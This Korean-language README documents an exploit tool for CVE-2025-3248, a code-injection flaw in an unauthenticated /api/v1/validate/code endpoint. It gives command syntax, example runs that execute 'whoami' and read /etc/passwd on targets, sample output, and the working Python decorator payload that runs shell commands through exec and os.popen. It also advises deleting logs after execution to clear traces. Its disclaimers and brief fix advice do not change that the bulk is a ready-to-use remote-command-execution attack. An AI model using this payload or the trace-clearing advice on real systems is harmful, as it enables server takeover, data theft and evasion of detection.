
CVE-2025-3248용 익스플로잇: 인증되지 않은 API 코드 엔드포인트에 조작된 Python 페이로드를 주입하여 대상 서버에서 임의 명령을 실행합니다.
CVE-2025-3248 취약점 익스플로잇 툴 문서 소개 이 도구는 CVE-2025-3248 취약점(Python 기반 코드 주입 취약점)을 악용하여 악성 페이로드를 구성해 대상 서버에서 원격 명령 실행(RCE)을 달성합니다. 이 취약점은 특정 웹 애플리케이션의 API 인터페이스에 존재하며, 공격자는 검증되지 않은 코드 실행 지점을 이용해 임의의 Python 코드를 주입할 수 있습니다. 중요 참고사항: 이 도구는 승인된 보안 테스트 목적으로만 사용해야 합니다. 허가되지 않은 침투 테스트는 법률 위반이 될 수 있습니다. 대상 시스템에 대한 명확한 승인을 받았는지 확인하십시오. 기능 특징 ✅ /api/v1/validate/code 인터페이스를 통해 악성 Python 코드 주입 ✅ 임의의 시스템 명령 실행 지원 (예: whoami, ls 등) ✅ 사용자 정의 타임아웃 시간 지원 (기본 10초) ✅ 텍스트/JSON 두 가지 출력 형식 지원 ✅ 상세한 오류 처리 및 로그 출력 사용 방법 기본 구문 bash
python cve-2025-3248.py -t <대상 URL> -c "<명령>" [옵션] 매개변수 설명 매개변수 필수 설명 -t, --target 예 대상 URL (형식: http://ip:port) -c, --command 예 실행할 시스템 명령 (따옴표로 감싸야 함) -o, --output 아니오 출력 형식 (text/json, 기본값 text) --timeout 아니오 요청 타임아웃 시간 (초, 기본값 10) -v, --verbose 아니오 상세 실행 로그 표시 사용 예시 예시 1: whoami 명령 실행 (기본 출력 형식) bash
python cve-2025-3248.py -t http://192.168.1.100:7860 -c "whoami" 출력 예시: 텍스트
예시 2: JSON 형식 출력 + 상세 로그 bash
python cve-2025-3248.py -t https://app.example.com -c "cat /etc/passwd" -o json -v 출력 예시: json
{ "status": 200, "content": "root❌0:0:root:/root:/bin/bash\n...", "success": true } 취약점 원리 간략 분석 대상 서비스는 /api/v1/validate/code 인터페이스에서 code 매개변수를 받음 서버 측에서 입력을 안전하게 필터링하지 않고, 전달된 Python 코드를 exec()로 직접 실행 공격자가 특수 페이로드를 구성: python
import os @exec("raise Exception(os.popen('whoami').read())") def f(): pass 예외 처리 메커니즘을 통해 os.popen()이 시스템 명령을 실행하도록 트리거 취약점 위험: 이 취약점은 서버에 대한 완전한 통제권을 초래할 수 있으며, 공격자는 임의의 시스템 명령 실행, 민감 데이터 탈취, 백도어 설치 등을 할 수 있습니다. 보안 경고 ⚠️ 이 도구는 승인된 침투 테스트에만 사용 ⚠️ 법적 위험: 명시적 승인 없이 이 도구를 사용한 침투 테스트는 컴퓨터 사기 및 남용 관련 법률 등에 위배될 수 있습니다 시스템 위험: 시스템 명령 실행으로 서비스 중단, 데이터 손실 또는 시스템 다운이 발생할 수 있습니다 탐지 위험: 공격 행위가 방화벽, IDS/IPS에 의해 탐지되어 기록될 수 있습니다 권장 사항: 통제된 환경(예: 연구실, 승인된 테스트 환경)에서만 사용하십시오 오작동을 방지하기 위해 -v 매개변수를 사용하여 상세 로그를 확인하는 것을 우선하십시오 실행 후 즉시 흔적을 정리하십시오 (예: 로그 삭제, 세션 종료) 종속 환경 Python 3.7+ requests 라이브러리 (사전 설치 필요) bash
pip install requests 오류 처리 설명 오류 코드 원인 해결 방법 [-] 대상 URL 형식 오류 URL에 scheme 또는 host 누락 URL 형식 확인 (예: ) [-] 요청 타임아웃 대상 응답 시간 초과 --timeout 매개변수 값 증가 [-] 연결 오류 대상에 연결 불가/방화벽 차단 네트워크 연결 상태 확인 [-] 명령 실행 실패 HTTP 상태 코드: 403 서버 측 권한 거부 대상 서비스가 코드 실행을 허용하는지 확인 기술 세부 사항 취약점 위치: /api/v1/validate/code POST 인터페이스 취약점 유형: 코드 주입(Code Injection) 영향을 받는 버전: 명시되지 않음 (스크립트는 해당 취약점이 존재하는 버전을 가정) 수정 권장 사항: 입력에 대한 엄격한 필터링 (exec/eval 등의 함수 금지) 사용자 입력 코드를 실행하기 위해 샌드박스 환경 사용 API 인터페이스의 권한 범위 제한 면책 조항: 이 문서는 보안 연구 및 교육 목적으로만 제공됩니다. 저자는 본 도구 사용으로 인한 직간접적 손해에 대해 책임을 지지 않습니다. 반드시 법률과 규정을 준수하여 보안 도구를 합법적으로 사용하시기 바랍니다.